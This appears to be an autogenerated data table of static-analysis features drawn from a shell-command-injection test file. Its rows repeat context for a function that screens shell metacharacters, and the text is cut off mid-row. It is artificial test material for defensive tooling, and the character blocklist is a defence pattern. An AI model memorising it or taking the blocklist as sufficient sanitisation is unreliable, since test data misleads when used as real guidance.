autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:384:13:384:15 | '\|' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:384:13:384:15 | '\|' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:384:13:384:15 | '\|' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:384:13:384:15 | '\|' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:384:13:384:15 | '\|' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:385:4:385:4 | s | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:385:4:385:4 | s | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:385:4:385:4 | s | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:385:4:385:4 | s | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:385:4:385:4 | s | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:385:4:385:7 | s[i] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:385:4:385:7 | s[i] | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:385:4:385:7 | s[i] | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:385:4:385:7 | s[i] | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:385:4:385:7 | s[i] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:385:4:385:15 | s[i] === '\\u02da' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:385:4:385:15 | s[i] === '\\u02da' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:385:4:385:15 | s[i] === '\\u02da' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:385:4:385:15 | s[i] === '\\u02da' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:385:4:385:15 | s[i] === '\\u02da' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:385:6:385:6 | i | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:385:6:385:6 | i | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:385:6:385:6 | i | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:385:6:385:6 | i | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:385:6:385:6 | i | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:385:13:385:15 | '\\u02da' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:385:13:385:15 | '\\u02da' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:385:13:385:15 | '\\u02da' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:385:13:385:15 | '\\u02da' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:385:13:385:15 | '\\u02da' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:386:4:386:4 | s | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:386:4:386:4 | s | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:386:4:386:4 | s | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:386:4:386:4 | s | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:386:4:386:4 | s | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:386:4:386:7 | s[i] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:386:4:386:7 | s[i] | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:386:4:386:7 | s[i] | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:386:4:386:7 | s[i] | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:386:4:386:7 | s[i] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:386:4:386:15 | s[i] === '$' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:386:4:386:15 | s[i] === '$' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:386:4:386:15 | s[i] === '$' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:386:4:386:15 | s[i] === '$' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:386:4:386:15 | s[i] === '$' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:386:6:386:6 | i | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:386:6:386:6 | i | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:386:6:386:6 | i | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:386:6:386:6 | i | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:386:6:386:6 | i | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:386:13:386:15 | '$' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:386:13:386:15 | '$' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:386:13:386:15 | '$' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:386:13:386:15 | '$' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:386:13:386:15 | '$' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:387:4:387:4 | s | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:387:4:387:4 | s | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:387:4:387:4 | s | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:387:4:387:4 | s | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:387:4:387:4 | s | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:387:4:387:7 | s[i] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:387:4:387:7 | s[i] | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:387:4:387:7 | s[i] | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:387:4:387:7 | s[i] | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:387:4:387:7 | s[i] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:387:4:387:15 | s[i] === ';' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:387:4:387:15 | s[i] === ';' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:387:4:387:15 | s[i] === ';' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:387:4:387:15 | s[i] === ';' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:387:4:387:15 | s[i] === ';' | fileImports | ./isImported 